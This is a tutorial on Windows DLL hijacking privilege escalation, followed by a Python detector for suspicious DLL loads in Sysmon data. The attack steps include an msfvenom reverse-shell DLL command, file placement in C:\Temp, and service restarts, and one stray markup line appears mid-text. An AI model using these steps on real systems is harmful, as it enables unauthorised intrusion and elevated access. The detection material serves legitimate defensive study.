INTRODUCTION

DLL Hijacking is an attack that abuses the way Windows applications search for and load Dynamic Link Libraries (DLLs). By controlling which DLL an application loads, an attacker can execute arbitrary code in that application's context and, when the application is a privileged service, gain elevated privileges.

HOW DLL HIJACKING WORKS

  1. Windows services load DLLs with the same privileges as the service itself. If attackers control the DLL, their code runs with the service's privileges.
  2. Absolute Path Vulnerability: When a service loads a DLL from a fixed path that low-privileged users can write to, attackers can replace it with a malicious one, causing privilege escalation.
  3. If an application looks for a DLL that does not exist on the system, attackers can place a malicious DLL with that name in a directory Windows searches, leading to privilege escalation.
  4. Windows searches for DLLs in a specific order (application directory, system directories, current directory, then the directories in PATH). Attackers exploit this by placing a malicious DLL in a location that is searched before the legitimate one.

STEPS TO IDENTIFY AND EXPLOIT INSECURE SERVICE EXECUTABLES

  1. Use winPEAS to list non-Microsoft services:
    .\winPEASx64.exe quiet servicesinfo

  2. Query the service configuration to find its binary path, then verify which directories in the system PATH are writable:
    sc qc dllsvc

  3. Check what access the low-privileged user has to the service (for example, whether it can start and stop it):
    .\accesschk.exe /accepteula -uvqc user dllsvc

  4. Launch Procmon and set a filter on the service's process name so only that executable's activity is shown:
    Procmon64.exe

  5. Filter out registry and network activity so only file-system events remain; DLL load failures show up there.

  6. Look for failed attempts to load the DLL (NAME NOT FOUND results); the search often ends in a writable directory such as:
    C:\Temp
</gre_replace_placeholder_do_not_emit>

  7. Use Metasploit to create a malicious DLL:
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP_ADDRESS] LPORT=[PORT_NUMBER] -f dll -o hijackme.dll

  8. Place the malicious DLL in the target directory:
    move hijackme.dll C:\Temp

  9. Restart the service to load the malicious DLL:
    net stop dllsvc
    net start dllsvc
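The loads that steps 6 to 9 produce (a service process pulling an unsigned DLL out of a user-writable directory such as C:\Temp) are exactly what a defender can alert on. The following detection is an added example, not part of the original page: it scores constructed Sysmon Event ID 7 (Image loaded) records, and the service path C:\Program Files\dllsvc\dllsvc.exe, the writable and trusted root lists, and the sample events are all assumptions made for the example.

```python
from dataclasses import dataclass

# Roots a standard (non-admin) user can usually write to. Constructed baseline
# for this example; in practice derive it from an ACL audit of PATH and service dirs.
WRITABLE_ROOTS = ("c:\\temp\\", "c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Roots from which a Windows service legitimately loads most of its DLLs.
TRUSTED_ROOTS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                 "c:\\program files\\", "c:\\program files (x86)\\")
SERVICE_ACCOUNTS = {"nt authority\\system", "nt authority\\local service",
                    "nt authority\\network service"}

@dataclass(frozen=True)
class Alert:
    process: str
    dll: str
    reasons: tuple

def _under(path: str, roots) -> bool:
    # Case-insensitive prefix match; Windows paths are case-insensitive.
    p = path.lower()
    return any(p.startswith(r) for r in roots)

def inspect_image_load(event: dict):
    """Score one Sysmon Event ID 7 (Image loaded) record; return an Alert or None."""
    dll = event["ImageLoaded"]
    reasons = []
    if _under(dll, WRITABLE_ROOTS):
        reasons.append("dll_in_user_writable_dir")
    if event.get("Signed", "false").lower() != "true":
        reasons.append("unsigned_dll")
    if event.get("User", "").lower() in SERVICE_ACCOUNTS and not _under(dll, TRUSTED_ROOTS):
        reasons.append("service_loaded_dll_outside_trusted_dirs")
    # A writable-directory load alone is common for per-user software; require a
    # second signal before alerting so the rule stays usable in a SIEM.
    if "dll_in_user_writable_dir" in reasons and len(reasons) >= 2:
        return Alert(event["Image"], dll, tuple(reasons))
    return None

def scan(events):
    return [a for a in map(inspect_image_load, events) if a is not None]

# Constructed Sysmon-style records (field names follow Event ID 7); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": "C:\\Program Files\\dllsvc\\dllsvc.exe", "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll",
     "Signed": "true", "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": "C:\\Program Files\\dllsvc\\dllsvc.exe", "ImageLoaded": "C:\\Temp\\hijackme.dll",
     "Signed": "false", "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": "C:\\Users\\alice\\AppData\\Local\\app\\app.exe",
     "ImageLoaded": "C:\\Users\\alice\\AppData\\Local\\app\\helper.dll",
     "Signed": "true", "User": "DESKTOP\\alice"},
]
```

Only the second record fires: the signed per-user helper in the third record stays below the two-signal threshold, which is the trade-off to tune against your own baseline of legitimate loads.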